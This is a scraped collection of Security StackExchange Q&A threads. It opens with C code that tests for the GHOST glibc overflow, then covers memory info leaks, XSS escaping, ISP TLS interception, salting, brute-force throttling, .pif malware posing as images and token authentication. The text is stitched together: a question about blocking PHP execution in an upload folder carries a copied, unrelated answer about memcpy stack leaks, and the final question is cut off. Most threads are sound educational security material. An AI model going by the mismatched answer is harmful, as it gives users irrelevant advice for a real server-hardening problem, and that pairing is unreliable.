size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
char name[sizeof(temp.buffer)];
memset(name, '0', len);
name[len] = '\0';
retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);
if (strcmp(temp.canary, CANARY) != 0) {
puts("vulnerable");
exit(EXIT_SUCCESS);
}
if (retval == ERANGE) {
puts("not vulnerable");
exit(EXIT_SUCCESS);
}
puts("should not happen");
exit(EXIT_FAILURE);
} Edit:
I've added an ansible playbook here if it's of use to anyone; if you have a large number of systems to test, ansible will allow you to check them all quickly. Also, as per discussion below, if you find your servers are vulnerable and apply available patches, it is highly recommended that you reboot your system. | {
"source": [
"https://security.stackexchange.com/questions/80210",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/36782/"
]
} |
80,333 | I was reading a paper and saw that this piece of code has an information leakage vulnerability. It was saying the following code will "Leak memory layout information to the attackers". Could somebody please explain to me how this leaks information? struct userInfo{
char username[16];
void* (*printName)(char*);
} user;
...
user.printName = publicFunction.
...
n = attacker_controllable_value; //20
memcpy(buf, user.username, n); //get function ptr
SendToServer(buf); I can see memcpy will give exception but why should it return memory address to attacker(or whatever it is returning)? Thanks in advance | Assuming buf 's size is either controlled by n or larger than 16, the attacker could make n any number he wanted and use that to read an arbitrary amount of memory. memcpy and C in general do not throw exceptions or prevent this from happening. So long as you don't violate any sort of page protections or hit an invalid address, memcpy would continue merrily along until it copies the amount of memory requested. I assume that user and this vulnerable block of code is in a function somewhere. This likely means it resides on the stack. All local function variables, the return address, and other information are contained on the stack. The below diagram shows it's structure in systems using intel assembly (which most platforms use and I assume your computer does). You would be able to get the return address using this method if you were to make n large enough to cause memcpy to move forward in the stack frame. user would be in the section in this diagram labeled "Locally declared variables". EBP is a 4 byte value, so if we were to read past that and them copy the next 4 bytes with memcpy, we'd end up copying the return address. Note the the above depends on what architecture the program is running on. This paper is about iOS, and since I don't know anything about ARM, the specifics of this information could be somewhat inaccurate. | {
"source": [
"https://security.stackexchange.com/questions/80333",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/19694/"
]
} |
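The over-read described above can be reproduced from a high-level language with ctypes, as a rough sketch (assuming a 64-bit Linux or macOS system; the "function pointer" here is just the address of libc's printf). Copying 24 bytes out of a 16-byte username field also copies the adjacent pointer, which is exactly the memory-layout leak the paper refers to and what makes defeating ASLR possible.

```python
#!/usr/bin/env python3
"""ctypes re-creation of the struct over-read from the question above."""
import ctypes
import ctypes.util
import struct

libc = ctypes.CDLL(ctypes.util.find_library("c"))

class UserInfo(ctypes.Structure):
    # Mirrors the struct in the question: 16-byte name, then a function pointer.
    _fields_ = [("username", ctypes.c_char * 16),
                ("printName", ctypes.c_void_p)]

user = UserInfo()
user.username = b"alice"
user.printName = ctypes.cast(libc.printf, ctypes.c_void_p).value   # a real code address

n = 24                                          # "attacker-controlled" length > 16
leaked = ctypes.string_at(ctypes.addressof(user), n)

(ptr,) = struct.unpack("<Q", leaked[16:24])     # the bytes past the name hold the pointer
print(f"leaked code address: {ptr:#x} (printName is {user.printName:#x})")
```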
80,340 | How can I protect php execution in specific upload directory? Mostly, people put .htaccess in upload folder to protect php execution. But someone says it can be replaced by attackers. So how can I control it from the root .htaccess ? I tried to put the below codes in root .htaccess but it shows "500 internal sever error" and my website goes down. <Directory ^public_html/product/uploads>
<Files ^(*.php|*.phps)>
order deny,allow
deny from all
</Files>
</Directory> Thanks in advance | Assuming buf 's size is either controlled by n or larger than 16, the attacker could make n any number he wanted and use that to read an arbitrary amount of memory. memcpy and C in general do not throw exceptions or prevent this from happening. So long as you don't violate any sort of page protections or hit an invalid address, memcpy would continue merrily along until it copies the amount of memory requested. I assume that user and this vulnerable block of code is in a function somewhere. This likely means it resides on the stack. All local function variables, the return address, and other information are contained on the stack. The below diagram shows it's structure in systems using intel assembly (which most platforms use and I assume your computer does). You would be able to get the return address using this method if you were to make n large enough to cause memcpy to move forward in the stack frame. user would be in the section in this diagram labeled "Locally declared variables". EBP is a 4 byte value, so if we were to read past that and them copy the next 4 bytes with memcpy, we'd end up copying the return address. Note the the above depends on what architecture the program is running on. This paper is about iOS, and since I don't know anything about ARM, the specifics of this information could be somewhat inaccurate. | {
"source": [
"https://security.stackexchange.com/questions/80340",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/26034/"
]
} |
80,360 | A website (www.blue*****art.com) is trying to attack my server using the Shellshock vulnerability . After doing an Nmap scan on the attacking IP address, I found many open ports. It looks like the website is running Exim , which is vulnerable to GHOST . The website in question has not been maintained for the past three years (from copyright date, Twitter and Facebook status); possibly the owner passed away. A check with Sucuri shows that it is currently not blacklisted, because no malware has been found. Should I retaliate by taking over the website from the hacker and shutting it down to stop it from scanning other people's computers? | Not if you want to stay out of trouble. What you are suggesting is vigilante action, and most legal systems do not look kindly upon that. Even though you may feel you are protecting other, less tech-savvy people, it would probably still constitute a crime. What you could do, is try and find out if there are authorities to warn. This could be the hosting provider, the registrar, or the police of the country where the website is hosted. Or, if you believe the site has been hijacked, find either the owner or their remaining relatives. | {
"source": [
"https://security.stackexchange.com/questions/80360",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67281/"
]
} |
80,488 | It seems to me that because Users can post questions and comments in them with HTML markup (possibly <script> tags), Stack Exchange sites would be very exposed to XSS attacks. How do they protect from this? | For general comments, the script tags are properly escaped, so that it's just interpreted as text instead of as actual code. In this case, that sort of thing is handled via something known as HTML encoding, where your <script> tag would get turned into &lt;script&gt; and rendered as a text string instead of interpreted as code. That said, StackOverflow has worked on a new feature that allows executable javascript in people's answers: http://blog.stackoverflow.com/2014/09/introducing-runnable-javascript-css-and-html-code-snippets/ Some of the security points from the article I want to highlight: Are Stack Snippets Safe? Yes, as much as the web in general is safe. You are not in any more danger than you are when browsing any
site with JavaScript enabled. With that said, the snippets are running
client code in your browser, and you should always exercise caution
when running code contributed by another user. We isolate snippets
from our sites to block access to your private Stack Exchange data: •We use HTML5 sandboxed iframes in order to prevent many forms of
malicious attack. •We render the Snippets on an external domain
(stacksnippets.net) in order to ensure that the same-origin policy is
not in effect and to keep the snippets from accessing your logged-in
session or cookies. Like all other aspects of our site, Stack
Snippets are ultimately governed by the community. Because users can
still write code that creates annoying behaviors like infinite loops
or pop-ups, we disable snippets on any post that is heavily downvoted
(scoring less than -3 on Stack Overflow, -8 on Meta). If you see bad
code that you think should be disabled, downvote the post. If you see
code that is intended to be harmful (such as an attempt at phishing),
you should flag it for moderator attention. | {
"source": [
"https://security.stackexchange.com/questions/80488",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67322/"
]
} |
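As a minimal illustration of the HTML-encoding defence described in the answer above — a sketch using Python's standard library, not Stack Exchange's actual sanitizer — escaping turns would-be markup into harmless text:

```python
import html

user_comment = '<script>alert("xss")</script> nice post!'

# Escaping converts &, <, > and quotes into HTML entities, so the browser
# renders the "tag" as literal text instead of executing it as code.
safe_comment = html.escape(user_comment)
print(safe_comment)
# &lt;script&gt;alert(&quot;xss&quot;)&lt;/script&gt; nice post!
```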
80,662 | I found myself suddenly unable to access websites that use HTTPS, so I contacted my service provider, and they asked me to install a certificate in the Trusted Root Certificate Authorities store. But something isn't right: installing a certificate on every device connected to the same network just to be able to access websites that use HTTPS is just weird! How can I be sure that this certificate is issued by a trusted CA? When I tried to install it, I got the following message: Warning: If you install this root certificate, Windows will automatically trust any certificate issued by this CA. Installing a certificate with an unconfirmed thumbprint is a security risk. If you click "Yes" you acknowledge this risk. Here is the certificate information: Version: V3 Serial num: 00 f8 ab 36 f3 84 31 05 39 Signature algo: sha1RSA Signature hash algo: sha1 Issuer: ISSA, Internet, Internet, Beirut, Beirut, LB Subject: ISSA, Internet, Internet, Beirut, Beirut, LB Public Key: RSA (1024 bits) It's valid until 2019. And by the way, I'm in Lebanon. I contacted my ISP again and they told me that they're using some kind of an accelerator to enhance the speed, and it needs authentication, so they chose to use a certificate instead of making the user enter a username and password every time they wants to access websites that use HTTPS. And they suggested that if I'm not okay with that, they would put me in a new pool. So what should I do? | Whilst I don't know the specifics of your ISP, I would say that it's likely that what they're doing here is intercepting all traffic you send over the Internet. In order to do that (without you getting error messages whenever you visit an HTTPS encrypted site), they would need to install a root certificate, which is what you mention in your post. They need to do this as what this kind of interception usually entails is creating their own certificate for each site you visit. so for example if you visit https://www.amazon.com they need to have a certificate that your browser considers valid for that connection (which is one issued by a trusted Certificate Authority, either one provided with the browser or one you manually install). From your perspective, the problem here is it means that they can see all your Internet traffic including usernames/passwords/credit card details. So if they want to, they can look at that information. Also if they have a security breach it's possible that other people might get access to that information. In addition, they may also gain access to any account that you access over this Internet connection (e.g., email accounts). Finally, installing this root certificate allows them to modify your Internet traffic without detection. What I would recommend is that you query with them exactly why they need to see the details of your encrypted traffic (e.g., is this a legal requirement for your country) and if you're not 100% satisfied with the response, get a new ISP. Another possibility is to use a VPN and tunnel all your traffic through the VPN. If you are not happy with your ISP gaining this access to your HTTPS connections, do not install the root certificate they provided you. | {
"source": [
"https://security.stackexchange.com/questions/80662",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67541/"
]
} |
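A rough way to spot the kind of interception described in the answer above is to look at who issued the certificate your machine is actually being shown: with the ISP's proxy in place, the issuer would be their own CA (the "ISSA" name from the question) rather than the site's real certificate authority. A sketch using Python's standard library; the hostname is just an example:

```python
import socket
import ssl

def certificate_issuer(host: str, port: int = 443) -> dict:
    """Return the issuer fields of the certificate presented for host."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            cert = tls.getpeercert()
    # getpeercert() returns the issuer as a tuple of name-attribute tuples.
    return dict(attr[0] for attr in cert["issuer"])

print(certificate_issuer("www.example.com"))
# An interception proxy shows up here as an unexpected issuer organization.
```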
80,727 | When my users are authenticated they receive an authentication token, I need to use this authentication token to authorize some asp.net WebAPI calls. To do this I need to add the token to the head of that call, so I need the token accessible from the users browser. I think that storing the token in a cookie isn't the safest way, so what is the safest way to store that token and still accessible in my javascript to make API call's? | There are two ways you can save authentication information in the browser: Cookies HTML5 Web Storage In each case, you have to trust that browsers are implemented correctly, and that Website A can't somehow access the authentication information for Website B. In that sense, both storage mechanisms are equally secure. Problems can arise in terms of how you use them though. If you use cookies: The browser will automatically send the authentication information with every request to the API. This can be convenient so long as you know it's happening. You have to remember that CSRF is a thing, and deal with it. If you use HTML5 Web Storage: You have to write Javascript that manages exactly what authentication information is sent to the API. A big practical difference people care about is that with cookies, you have to worry about CSRF. To handle CSRF properly, you need an additional "synchronizer token". All-in-one web frameworks (like Grails, Rails, probably asp.net) usually provide an easy way to enable CSRF protection, and automatically add synchronizer token stuff in your UI. But if you're writing a UI using a client-side-only web framework (like AngularJS or BackboneJS), you're going to have to write some Javascript to manage the synchronizer token. So in that case you might as well just go with the HTML5 Web Storage approach and only worry about one token. | {
"source": [
"https://security.stackexchange.com/questions/80727",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67600/"
]
} |
80,904 | Today I had a hard time explaining the difference to a friend. I know seeds are used when generating "random" strings. And salts are used when providing different outcomes to a hash. What is a better way of describing these concepts and their possible differences. | Seed: Encryption is powered by random numbers, but how do you generate a truly random number? The current millisecond? The number of processor threads in use? You need a starting point. This is called a seed: it kicks off a random number. Salt: When you hash a string, it will always end up with the same hash. foo = acbd18db4cc2f85cedef654fccc4a4d8 every time. This is a problem when you want to store things that you want to keep truly hidden (like passwords). If you see acbd18db4cc2f85cedef654fccc4a4d8 you always know that it is foo . So, you simply add a "salt" to the original string to make sure that it is unique. foo + asdf = e967c9fead712d976ed6fb3d3544ee6a foo + zxcv = a6fa8477827b2d1a4c4824e66703daa9 So 'salt' makes a 'hash' better by obscuring the original text. | {
"source": [
"https://security.stackexchange.com/questions/80904",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/6402/"
]
} |
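A small sketch of the salting idea from the answer above, using Python's standard library. MD5 appears here only because the answer's example hashes are MD5 — real password storage should use a dedicated password hash such as bcrypt or scrypt — and the salt values are illustrative:

```python
import hashlib
import os

def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()

print(md5_hex("foo"))           # acbd18db4cc2f85cedef654fccc4a4d8, every time
print(md5_hex("foo" + "asdf"))  # a completely different digest once salted
print(md5_hex("foo" + "zxcv"))  # and different again with another salt

# In practice the salt is random and stored next to the hash, so it can be
# reused when verifying the password later.
salt = os.urandom(16).hex()
stored = f"{salt}:{md5_hex('foo' + salt)}"
print(stored)
```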
80,991 | While perusing the contents of pcap files I've noticed some URLs appear to be visible despite being HTTPS. These mainly occur inside payloads that contain cert URLs too, but I also see HTTPS URLs inside what appear to be HTTP payloads. Can someone say conclusively whether HTTPS URLs are truly kept secret? I'm concerned about this because I want to put some parameters in the URL and I don't want these to be easily uncovered. | With HTTPS the path and query string of the URL is encrypted, while the hostname is visible inside the SSL handshake as plain text if the client uses Server Name Indication (SNI). All modern clients use SNI because this is the only way to have different hosts with their own certificates behind the same IP address. The rest of the URL (i.e. everything but the hostname) will only be used inside the encrypted connection. Thus in theory it is hidden from the attacker unless the encryption itself gets broken (compromising the private key, man-in-the-middle attacks etc). In practice an attacker might have indirect ways to get information about the remaining part of the URL: Different pages on the same server serve different content with different sizes etc. If the attacker scans the site to find out all possible pages he might then be able to find out which pages you've accessed just by looking at the size of the transferred data. Links to other sites contain Referer header. Usually the Referer is stripped when linking from https to http, but if the attacker controls one of the sites linked with https he might be able to find out where the link came from, that is the site you've accessed. But in most cases you are pretty safe with HTTPS, at least much safer than with plain HTTP. | {
"source": [
"https://security.stackexchange.com/questions/80991",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67642/"
]
} |
81,228 | In his answer to " How does SSL/TLS work? ", Luc gives an explanation of how SSL works: SSL (and its successor, TLS) is a protocol that operates directly on top of TCP (although there are also implementations for datagram based protocols such as UDP). This way, protocols on higher layers (such as HTTP) can be left unchanged while still providing a secure connection. Underneath the SSL layer, HTTP is identical to HTTPS. In his first sentence, he is saying that protocols on higher layers can be left unchanged. What does he mean? I know the OSI layers, but I think I've got some knowledge issues here. | You should think of OSI layers as packaging. Let's say I want to ship a glass to you. I chose an original package for advertisement purposes, showing how nice is my product and what you can buy to add to your "glass" experience. That's the high layer of my protocol. Then I put this package in a box filled with soft thingies because I don't want it to be broken by transportation. This is a second layer. Then my shipment department enclose this box into a bigger package, with a label to be shipped to your home. Again, another layer. Then the transporter put this box in a truck with many other boxes and instruct the driver to go to another delivery center, again another layer. For what we know, the truck driver does not need to know : where do the boxes go exactly in your home, he just needs to know your address what protection are in the boxes, he just has to drive as safely as it's instructed in his contract what exactly is in the boxes Let's say now that I want to provide confidentiality to my shipment. Because, a curious driver could try to tamper with the packages to know what's inside, or steal it and resell it. I can use a protocol where your packaged-soft-coated glass is also put into a metal box with a locker. It will protect it from tampering by the truck driver, as he won't be able to peek inside, or take the merchandise. It does not protect the lower layers, he could still dump all the fret into a lake, this is denial of service. Moreover, my locker does not care what's inside it. It could be your glass, it could be flowers or it could be empty. But it still serves the purpose of avoiding anyone other than you (and the shipper ofc) to know what is inside. It goes the same for the protocols in the OSI. Lower layers does not care about what is happening in the upper layers. This is left for another agent to decode/handle it. Edit for clarification: when we say "left unchanged" it does not mean the information is not processed. For SSL in particular, the payload of the SSL layer is an encryption of the packet of the higher layer. But when SSL operated in the other side, it will decrypt the original packet with no modification. | {
"source": [
"https://security.stackexchange.com/questions/81228",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67987/"
]
} |
81,302 | I have created a login module on my website. I was able to deal with simple brute force attacks since I can identify the user based on username/email and throttle their login based on failed login attempts per user account. But when it comes to user-enumerated brute-force attacks (a.k.a. Reverse brute force attacks), identifying the user becomes pretty hard. Throttling the login based on failed attempts per IP address might not work well and annoy the users connected to the Internet through a local network since they'll have same external IP address, as they might face throttle due to failed attempts made by someone else on the network. Is there a way to uniquely identify such users? | How to uniquely identify users with the same external IP address?
Is there any way to uniquely identify such users? Yes, there are lots of ways: Cookies Evercookies (JavaScript code that uses lots of different techniques to store identifying information, among them flash cookies, the various HTML5 storage options, the browsers visited links history, etc) Device fingerprinting: use the HTTP header (mainly User Agent, but the other headers and their order can help as well) Device fingerprinting with JavaScript: with JavaScript, you can get a lot of information, such as screen resolution, timezone, plugins, system fonts, etc. Behavior: how fast do the users fill in forms, where on a button do they click, etc. But most of these are not useful in defending against brute-force attacks, since the program doing them will probably not accept cookies or run JavaScript. In your case, you might try: HTTP header: these might actually already be enough to differentiate between users using the same IP address (of course, an attacker can just randomly switch them, but I would assume most currently don't). Light throttling: you don't have to block IP addresses, you could just slow down the login process for them. That way, brute forcing becomes a lot less feasible, but real users using the same IP address can still login. CAPTCHAs : these will annoy legitimate users, but hopefully not too many users actually use an IP address from which brute-force attacks originate (of course, there are tools to automatically solve CAPTCHAs, but it's still harder than no CAPTCHA). You could require a user to accept cookies, and to send various identifying information before being allowed to login (such as the screen resolution, timezone, etc.). Of course, an attacker can do this as well, but I don't think any currently existing bruteforce tools can do this, so they would have to write a custom script. But this might also annoy legitimate users. | {
"source": [
"https://security.stackexchange.com/questions/81302",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/54346/"
]
} |
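A rough sketch of the "light throttling" option from the answer above: slow down, rather than block, a source that keeps failing. The key used here (IP address plus User-Agent) and the delay schedule are illustrative assumptions — pick whatever fingerprint and limits suit your application:

```python
import time
from collections import defaultdict

failed_attempts = defaultdict(int)  # (ip, user_agent) -> consecutive failures

def throttled_login(ip: str, user_agent: str, credentials_ok) -> bool:
    key = (ip, user_agent)
    # Each failure doubles the wait (capped), so brute forcing slows to a
    # crawl while a legitimate user retyping a password barely notices.
    delay = min(2 ** failed_attempts[key] - 1, 30)
    if delay:
        time.sleep(delay)
    if credentials_ok():
        failed_attempts[key] = 0
        return True
    failed_attempts[key] += 1
    return False
```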
81,462 | I'm currently reading about one time pad encryption, and I have a question. They say OTP encryption is unbreakable, and this can be proved mathematically. This is provided that the key used is truly random and is used only one time, right? What if I come with a whole system (can be software or hardware or a combination of both) to force these two conditions? Will I have the best & ideal encryption solution? Say for example the two sides willing to exchange information are getting the keys by connecting to a server that is online all the time. The server will ensure the keys generated are random, and will ensure that a key is never used again. The users at each side will only have to have an internet connection and a mechanism to exchange information. The information will travel via the internet encrypted using the one time pad key generated randomly by the server. Am I making any sense here? I just started reading about one time pad, and started wondering about this. There are many websites that will tell you that one time pad isn't practical at all, because you can't really come up with a truly random number or something like this. Addition: Do these guys offer anything special in key distribution? They say they have perfected implementing OTP over time. http://www.mils.com/en/technology/unbreakable-encryption/#1 | Key distribution is the problem. In your scenario, you use a server to communicate the one-time pads to the users. But how is that communication protected? Not by a one-time pad, or it wouldn't be necessary. Let's say it's SSL with AES 128. Then, wham, your cryptosystem is as secure as SSL with AES 128 - pretty secure, but not as secure as a one-time pad. The mils guys you reference appear to be offering physical devices which you load a one-time keystream onto (and can use it from). Again, key distribution is a problem. You could buy two hard drives, load terabytes of keystream on them, and send one to your buddy... how? Do you trust USPS? Fedex? Courier? Diplomatic pouch? All of these can be compromised. The only perfectly encrypted way to send them would be to encrypt them with a one-time pa... crap, it happened again. | {
"source": [
"https://security.stackexchange.com/questions/81462",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68183/"
]
} |
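The pad itself is the easy part — a few lines of XOR, as sketched below. What the answer above stresses is that none of this helps until you have moved the pad to the other side over a channel at least as secure as the message itself:

```python
import os

def otp_encrypt(plaintext: bytes):
    pad = os.urandom(len(plaintext))  # fresh, truly random, used exactly once
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, pad))
    return pad, ciphertext

def otp_decrypt(pad: bytes, ciphertext: bytes) -> bytes:
    return bytes(c ^ k for c, k in zip(ciphertext, pad))

pad, ct = otp_encrypt(b"attack at dawn")
assert otp_decrypt(pad, ct) == b"attack at dawn"
# Reusing `pad` for a second message, or generating it with a weak RNG,
# destroys the perfect-secrecy guarantee.
```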
81,677 | I was reading up on FireEye and came across this NYTimes article detailing a Skype chat where an image was sent laden with malware : Quote: To gain access to information on the devices..., hackers posed as women on Skype, identified the types of devices the targets were using and sent photos laden with malware. The second photo was a particularly potent piece of malware that copied files from the targets computer I know exif data and IPTC headers exist in images and am pretty sure you could stuff some extra info in an image file using FileMagic mimetype header info, but how is it possible to embed executable code in an image? The image file format was pif so unless the computer had an app that opened the file and showed a picture while secretly exectuing code, I dont see how its possible. | The answer is simple. That was not a photo. And .pif is not an image format. Count on NYTimes to provide correct technical info. As the log on NYTimes's article says, and as FireEye's actual report confirms, the file used was a .pif file . It's one of the less known of Windows's executable file extensions. .pif is legacy from MS-DOS, like .com. It's intended to be a "program information file" (hence the name), storing a shortcut to a (DOS) program along with various info to the system on how to treat it. Even today, Windows gives .pif files a shortcut-type icon. The funny thing is that, today, Windows doesn't really care if the .pif is really just a program information file. Try it: rename any .exe file into a .pif and run it. There might be some difference like the icon not displaying, but that's all. That's what uniform treatment of files of different formats gets you. Thanks, Microsoft! Why does this happen? Short answer: Because Windows . Longer answer: Windows runs a .pif through ShellExecute , which technically should find a suitable program to open a file and then use it to open it. With .pif files, it first checks if it is really a file that points to an MS-DOS executable. If it doesn't conform to the .pif file format, ShellExecute checks if it contains executable code. If it does, it gets run as if it was a .exe. Why? Because Windows! What did the suuper-scary genius hackers do? These guys didn't bother doing anything complicated: they made a self-extracting-and-executing SFXRAR archive out of a virus installer and a program (probably just a .bat) opening an image of a girl that they found on the internet, renamed that devilish contraption into a .pif file and sent it to the hapless freedom fighter. Why did they use .pif? For two reasons, obviously: Few people know that it can run as an executable file ( thanks, Microsoft! ) It obviously sounds like .gif or .tiff or .pdf or something very image-y . Even you didn't doubt from its name that it was an image format, didn't you, OP? ;) Concerning your actual question ("how is it possible to embed executable code in an image"). Yes, it is possible to execute code via a specially crafted image provided it is opened in a vulnerable program. This can be done by exploiting an attack like a buffer overflow . But these specific hackers were most probably not clever enough for this. Edit Interesting note: these guys actually used DarkComet, which has the ability to generate compressed executables with different extensions, .pif being in their list. I'm not sure about displaying an image, but this could be a functionality added in a newer version. Another edit I see you're asking on how to protect against this specific " vulnerability ". 
The answer is simple. First, make sure Windows shows you file extensions . Windows mostly hides them by default ( thanks, Microsoft! ) Then learn this by heart: .exe .com .cmd .bat .pif .vb .vba .vbs .msi .reg .ws .wsc .wsf .cpl .lnk . These are the best known file types that can easily execute potentially malicious code or otherwise harm your computer if opened, whether you have vulnerable applications installed or not. If someone sends you such a file saying it's an image of a pretty girl, you can be sure it's another low-profile hacker like these syrian guys. Another option is simply being pro-active and checking and double-checking any downloaded file with an unfamiliar file format. It could be malware, you know. As for real images with exploits... you could probably try keeping your software up to date. | {
"source": [
"https://security.stackexchange.com/questions/81677",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10505/"
]
} |
81,756 | I am trying to get a handle on some terms and mechanisms and find out how they relate to each other or how they overlap. Authenticating a theoretical web application and mobile application is the focus. The focus is on the exact difference between token based authentication and cookie based authentication and if/how they intersect. HTTP basic/digest and complex systems like oauth/aws auth do not interest me . I have a few assertions which I would like to put out there and see if they are correct. Only using authentication tokens, without sessions, is possible in mobile applications. In a browser context, you need cookies to persist the tokens client-side. You exchange your credentials (usually username/pw) for a token which can be limited in scope and time. But this also means that the token and everything relating to it must be persisted and handled by the server as well. Tokens can be revoked server-side. Cookies do not have that option and will/should expire. Using only cookies means that sessionId is related to the user account and not limited in any way. I am hoping I am not too far off the mark and am thankful for any help! | In Session-based Authentication the Server does all the heavy lifting server-side. Broadly speaking a client authenticates with its credentials and receives a session_id (which can be stored in a cookie) and attaches this to every subsequent outgoing request. So this could be considered a "token" as it is the equivalent of a set of credentials. There is however nothing fancy about this session_id string. It is just an identifier and the server does everything else. It is stateful. It associates the identifier with a user account (e.g. in memory or in a database). It can restrict or limit this session to certain operations or a certain time period and can invalidate it if there are security concerns. More importantly it can do and change all of this on the fly. Furthermore it can log the user's every move on the website(s). Possible disadvantages are bad scale-ability (especially over more than one server farm) and extensive memory usage. In Token-based Authentication no session is persisted server-side (stateless). The initial steps are the same. Credentials are exchanged against a token which is then attached to every subsequent request (it can also be stored in a cookie). However for the purpose of decreasing memory usage, easy scale-ability and total flexibility (tokens can be exchanged with another client) a string with all the necessary information is issued (the token) which is checked after each request made by the client to the server. There are a number of ways to use/create tokens: Using a hash mechanism e.g. HMAC-SHA1 token = user_id|expiry_date|HMAC(user_id|expiry_date, k) where user_id and expiry_date are sent in plaintext with the resulting hash attached ( k is only know to the server). Encrypting the token symmetrically e.g. with AES token = AES(user_id|expiry_date, x) where x represents the en-/decryption key. Encrypting it asymmetrically e.g. with RSA token = RSA(user_id|expiry_date, private key) Production systems are usually more complex than those two archetypes. Amazon for example uses both mechanisms on its website. Also hybrids can be used to issue tokens as described in 2 and also associate a user session with it for user tracking or possible revocation and still retain the client flexibility of classic tokens. Also OAuth 2.0 uses short-lived and specific bearer-tokens and longer-lived refresh tokens e.g. to get bearer-tokens. 
Sources: https://auth0.com/blog/critical-vulnerabilities-in-json-web-token-libraries/ https://stackoverflow.com/questions/1283594/securing-cookie-based-authentication https://web.archive.org/web/20170913233103/https://auth0.com/blog/angularjs-authentication-with-cookies-vs-token/ Demystifying Web Authentication (Stateless Session Cookies) https://scotch.io/tutorials/the-ins-and-outs-of-token-based-authentication | {
"source": [
"https://security.stackexchange.com/questions/81756",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/56944/"
]
} |
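A minimal sketch of the first token construction listed in the answer above (user_id|expiry_date plus an HMAC under a server-only key). SHA-256 is used here instead of the SHA-1 named in the example, and the separator and key are illustrative assumptions:

```python
import hashlib
import hmac
import time

SERVER_KEY = b"secret known only to the server"

def issue_token(user_id: str, ttl_seconds: int = 3600) -> str:
    expiry = str(int(time.time()) + ttl_seconds)
    payload = f"{user_id}|{expiry}"
    mac = hmac.new(SERVER_KEY, payload.encode(), hashlib.sha256).hexdigest()
    return f"{payload}|{mac}"

def verify_token(token: str):
    try:
        user_id, expiry, mac = token.split("|")  # assumes user_id contains no '|'
    except ValueError:
        return None
    expected = hmac.new(SERVER_KEY, f"{user_id}|{expiry}".encode(),
                        hashlib.sha256).hexdigest()
    if hmac.compare_digest(mac, expected) and int(expiry) > time.time():
        return user_id  # token is genuine and not yet expired
    return None
```

Because the server can recompute the MAC from the token's plaintext fields, it does not need to keep any per-session state — which is exactly the scalability argument made above.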
81,781 | I was renewing my Internet subscription through the online portal of my ISP. What struck me was when I was entering my credit card details, I entered the type of my credit card (MasterCard, Visa, AA, etc), and when I entered the numbers, there was one number that I entered wrong. When I pressed the submit button, the website automatically gave me an error that the card number I entered was invalid. I sense this was done locally in the browser and no data was pushed and checked on a server and a reply sent back. Is there any sequence of numbers each vendor has? Otherwise, how would the website (locally) know about the wrong number? | Checksums CC numbers, as well as pretty much any other well designed important numbers (e.g. account numbers in banks), tend to include a checksum to verify the integrity of the number. While not a security feature (since it's trivial to calculate), a decent checksum algorithm can guarantee to always fail if (a) a single typo was made or (b) two neighbouring digits are swapped, which are the two most common errors when manually entering long numbers. http://rosettacode.org/wiki/Luhn_test_of_credit_card_numbers is an example of such a test. Issuer If a CC number is technically correct, it may still not be a real CC number. The method for verifying that is simple and complicated at the same time - generally, if you have appropriate access you are able to look up the issuer institution for each range of card numbers, and then you ask the issuer's card systems if they think that this is a valid card. Well, the second part generally happens as a part of making a CC payment, but verifying the issuer is sometimes done before that as an extended test; but not in the client browser. | {
"source": [
"https://security.stackexchange.com/questions/81781",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/60357/"
]
} |
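The checksum referenced in the answer above (the Luhn test) is short enough to sketch in full; this is a generic implementation, not the validation code of any particular payment page:

```python
def luhn_ok(number: str) -> bool:
    """Return True if a digit string passes the Luhn checksum."""
    digits = [int(ch) for ch in number if ch.isdigit()]
    total = 0
    # From the rightmost digit: double every second digit, and subtract 9
    # whenever doubling produces a two-digit result.
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

print(luhn_ok("79927398713"))  # True  -- a classic Luhn test value
print(luhn_ok("79927398710"))  # False -- a single mistyped digit is caught
```

This is why the browser can reject an obviously mistyped number locally, while only the issuer can say whether a well-formed number belongs to a real card.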
81,801 | When I type example.com without any scheme into the browser bar and press Enter it is interpreted as HTTP://example.com , not HTTPS://example.com . Why? And where are the plans to fix this? (To be clear, I'm talking only about typed/pasted addresses coming from a "lazy" user, not about software-defined actions such as following scheme-relative URLs, window.location = "url" etc. And obviously typing/pasting HTTP://example.com must still work.) EDIT : As some answers point out sites already can mostly achieve this with redirects + HSTS. The central technical gain would be narrowing the first-connection problem (also addressed by HSTS preload but that can't scale to all sites). I can see how that's a weak justification for breaking things now ; what I'm more interested in is whether it's an obvious endgame in 5 years? 10? 20? I can see several problems on the way to defaulting to https interpretation: User experience with sites that only work over http. Defaulting to https would show an error but the user usually has no idea whether it should work, i.e. whether this site simply never worked over https or is this a downgrade attack. If the error page for this situation will contain an easy "did you mean http:...?" link(*), users will get used to clicking that on any site that doesn't work and we haven't gained much(?). And if it's not easy (e.g. user must edit https -> http , users won't use such browser. EDIT : I should have clarified that the error indication must be different from explicitly going to an HTTPS address which failed — this scenario is not so much "fail" as "the safe interpretation didn't work". And for starters, even "soft failing" automatically to HTTP with a warning bar on top would be OK. But I think we still gain 3 things: going to unsecure site is a conscious action, we educate users that unsecure HTTP is not normal , and we put pressure on sites to implement https. Inconvenience of having to type http:// in some cases. IMO completely outweighed by convenience of not having to type https:// in more cases. "Compatibility" with the historical default. I'm not sure if it's enshrined in some standard, but IMO it's clear we'll have to change it some day , so that's not a 